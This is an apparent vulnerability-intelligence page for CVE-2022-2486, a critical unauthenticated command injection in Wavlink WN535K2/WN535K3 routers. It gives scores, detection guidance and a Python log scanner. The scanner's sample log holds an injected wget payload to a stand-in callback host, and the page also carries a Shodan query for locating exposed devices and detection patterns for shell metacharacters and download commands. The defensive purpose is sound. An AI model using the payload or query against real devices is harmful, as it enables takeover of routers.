CVE-2022-2486
Published 2022-07-20
Priority: P1 · 84 · critical · 9.8 (CVSS 3.1)
AV:N / AC:L / PR:N / UI:N / S:U / C:H / I:H / A:H
ITW · EXPLOIT · VulnCheck KEV
Exploited in the wild
EPSS: 26.05% (97.7th percentile)
A vulnerability, which was classified as critical, was found in WAVLINK WN535K2 and WN535K3. This affects an unknown part of the file /cgi-bin/mesh.cgi?page=upgrade. The manipulation of the argument key leads to os command injection. The exploit has been disclosed to the public and may be used.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| wavlink | wn535k2 | — | — |
| wavlink | wn535k3 | — | — |
Detection & IOCs
- Look for HTTP GET requests to /cgi-bin/mesh.cgi with page=upgrade and a key parameter containing shell metacharacters (e.g., semicolons, quotes, wget commands) indicative of OS command injection attempts.
- Shodan query 'http.title:"Wi-Fi APP Login"' can be used to identify exposed Wavlink WN535K2/WN535K3 devices on the internet.
- Successful exploitation results in an HTTP 500 response from the target device; use this status code combined with an out-of-band HTTP interaction (OAST/interactsh) to confirm RCE.
- Monitor for outbound HTTP requests (wget) originating from Wavlink router processes, which would indicate successful command injection via the key parameter.
- The vulnerability is unauthenticated (PR:N/UI:N), meaning no credentials are required to exploit it. Detection rules should not filter out unauthenticated requests to this endpoint.
- The OAST-based detection template requires an out-of-band interaction server (e.g., interactsh) to confirm exploitation, as the injected command triggers an outbound wget rather than returning output in-band.
- Affected devices are Wavlink WN535K2 and WN535K3 only; scope detection rules to CPE cpe:2.3:h:wavlink:wl-wn535k2 and the associated WN535K3 model.
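
A log-side check for the request pattern, the HTTP 500 signal and the no-authentication caveat in the notes above, added here as an example (it is not taken from any of the cited sources). It assumes combined-format access logs from a proxy or sensor in front of the device; the function names, sample lines, and the inclusion of `curl` alongside `wget` are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample lines (combined log format, documentation addresses only).
SAMPLE_LOG = [
    '198.51.100.7 - - [20/Jul/2022:10:01:02 +0000] "GET /cgi-bin/mesh.cgi?page=upgrade&key=abc%3Bwget%20http%3A%2F%2Fcallback.example%2Fx HTTP/1.1" 500 0',
    '192.0.2.10 - - [20/Jul/2022:10:02:00 +0000] "GET /cgi-bin/mesh.cgi?page=upgrade&key=a1b2c3d4 HTTP/1.1" 200 512',
    '203.0.113.5 - - [20/Jul/2022:10:03:00 +0000] "GET /cgi-bin/mesh.cgi?page=upgrade&key=%27x HTTP/1.1" 404 0',
    '192.0.2.10 - - [20/Jul/2022:10:04:00 +0000] "GET /index.html?key=%3Bid HTTP/1.1" 200 90',
]

# Source address, request target and status code of one access-log line.
LOG_RE = re.compile(r'^(?P<src>\S+) .*?"[A-Z]+ (?P<target>\S+) [^"]*" (?P<status>\d{3})')
# Characters a shell treats specially; none belong in a legitimate key value.
SHELL_META = re.compile(r"[;|&`$<>'\"\\()\n]")
# wget is named in the notes above; curl is added as an assumption.
FETCH_CMD = re.compile(r"\b(?:wget|curl)\b", re.IGNORECASE)

def inspect(line):
    """Return a finding dict for a suspicious mesh.cgi request, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    url = urlsplit(m["target"])
    if url.path != "/cgi-bin/mesh.cgi":
        return None
    qs = parse_qs(url.query, keep_blank_values=True)  # also percent-decodes
    if "upgrade" not in qs.get("page", []):
        return None
    reasons = set()
    for value in qs.get("key", []):
        if SHELL_META.search(value):
            reasons.add("shell-metacharacter")
        if FETCH_CMD.search(value):
            reasons.add("download-command")
    if not reasons:
        return None
    status = int(m["status"])
    # The auth-user field is deliberately ignored: the flaw needs no credentials.
    return {"src": m["src"], "status": status,
            "reasons": sorted(reasons), "http_500": status == 500}

def scan(lines):
    """Run inspect() over an iterable of log lines and keep the findings."""
    return [finding for finding in map(inspect, lines) if finding]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

A finding with `http_500` set is the one to correlate with outbound HTTP from the router, per the notes above; the other findings are attempts whose outcome the log alone does not show.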
CVSS provenance
- nvd · v3.1 · 9.8 CRITICAL · CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
- vulncheck · 8.0 HIGH
GHSA
GHSA-c8qm-jmpw-q7p3: A vulnerability, which was classified as critical, was found in WAVLINK WN535K2 and WN535K3
ghsa_unreviewed · 2022-07-21
CVE-2022-2486 [CRITICAL] CWE-78 GHSA-c8qm-jmpw-q7p3: A vulnerability, which was classified as critical, was found in WAVLINK WN535K2 and WN535K3
VulnCheck
wavlink wl-wn535k2 Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
vulncheck · 2022 · CVSS 8.0
CVE-2022-2486 [HIGH] wavlink wl-wn535k2 Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
Affected: wavlink wl-wn535k2
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://web.archive.org/web/20230318134256/https://unit42.paloaltonetworks.com/network-security-trends-aug-oct-2022/; https://dashboard.shadowserver.org/statistics/honeypot/vulnera
No detection rules found.
Nuclei
Wavlink WN535K2/WN535K3 - OS Command Injection
nuclei · CVSS 9.8
CVE-2022-2486 [CRITICAL] Wavlink WN535K2/WN535K3 - OS Command Injection
Wavlink WN535K2 and WN535K3 routers are susceptible to OS command injection in an unknown part of the file /cgi-bin/mesh.cgi?page=upgrade via manipulation of the argument key. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials.
Template:

```yaml
id: CVE-2022-2486

info:
  name: Wavlink WN535K2/WN535K3 - OS Command Injection
  author: For3stCo1d
  severity: critical
  description: |
    Wavlink WN535K2 and WN535K3 routers are susceptible to OS command injection in an unknown part of the file /cgi-bin/mesh.cgi?page=upgrade via manipulation of the argument key. An attacker can execute malware, obtain sensitive information, modify data, and/or gain fu
```